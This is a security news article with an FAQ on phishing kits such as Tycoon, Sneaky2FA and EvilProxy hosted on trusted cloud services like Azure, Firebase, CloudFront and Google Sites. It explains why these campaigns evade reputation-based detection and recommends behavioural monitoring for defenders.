Attackers use trusted cloud platforms to host phishing kits

Security teams are seeing more phishing campaigns delivered through well-known cloud and CDN services rather than suspicious domains.

What happened

Researchers have observed a growing number of phishing campaigns hosted on legitimate cloud and content delivery network platforms, including Google Cloud, Microsoft Azure, and AWS CloudFront. According to Cyber Security News, threat actors are deploying full phishing kits on these services to impersonate Microsoft 365 and other enterprise login pages, making malicious activity harder to detect because the underlying infrastructure is widely trusted.

Going deeper

Unlike traditional phishing operations that rely on newly registered domains, these campaigns operate entirely within established cloud ecosystems. Analysts found that the Tycoon was hosted on Microsoft Azure Blob Storage, while Sneaky2FA appeared on Firebase Cloud Storage and AWS CloudFront. Another kit, EvilProxy, used Google Sites to deliver credential harvesting pages. These campaigns often filter out consumer email accounts and focus on corporate credentials, increasing their value to attackers. Because the hosting domains belong to major technology providers, security tools that rely on reputation scoring are less likely to block the traffic. The malicious behavior is embedded in page content and user interaction flows rather than network indicators.

What was said

Researchers said that cloud-hosted phishing infrastructure changes how defenders must approach detection. Traditional controls that flag unknown domains or recently registered sites are less effective when attackers use well-established platforms. Analysts noted that identifying abuse now requires closer inspection of page behavior, form handling, and authentication prompts. They also warned that enterprise users are at higher risk because these campaigns are designed to look identical to familiar corporate login workflows. Security teams were advised to review how cloud storage and site hosting services are monitored within their environments.

The big picture

Other recent reporting shows how deeply this tactic is taking hold. Cyber Press found that threat actors tied to Chinese hosting infrastructure have built out a network of more than 18,000 active command-and-control servers spread across 48 cloud and hosting providers. The scale matters. Malicious activity is no longer hiding on sketchy domains at the edges of the internet; it’s sitting inside the same cloud platforms many organizations trust every day. As phishing kits and command infrastructure continue to live inside well-known services, security teams are being forced to rethink detection, focusing less on where traffic comes from and more on how those platforms are being abused.

FAQs

Why do attackers prefer cloud platforms for phishing?

Cloud services provide trusted domains, reliable uptime, and easy deployment, which helps phishing pages avoid early detection.

Why are these attacks harder to block?

Security tools often treat traffic from major cloud providers as legitimate, and the malicious activity is contained in the page content rather than the domain itself.

Which users are most often targeted?

Many campaigns focus on enterprise accounts, especially Microsoft 365 users, because corporate credentials can provide broader access.

What controls can help detect cloud-hosted phishing?

Behavioral analysis, identity protection, user interaction monitoring, and inspection of authentication workflows are more effective than domain checks alone.

Can cloud providers stop this abuse?

Providers can remove reported malicious content, but attackers often redeploy quickly, so organizations still need internal detection and response measures.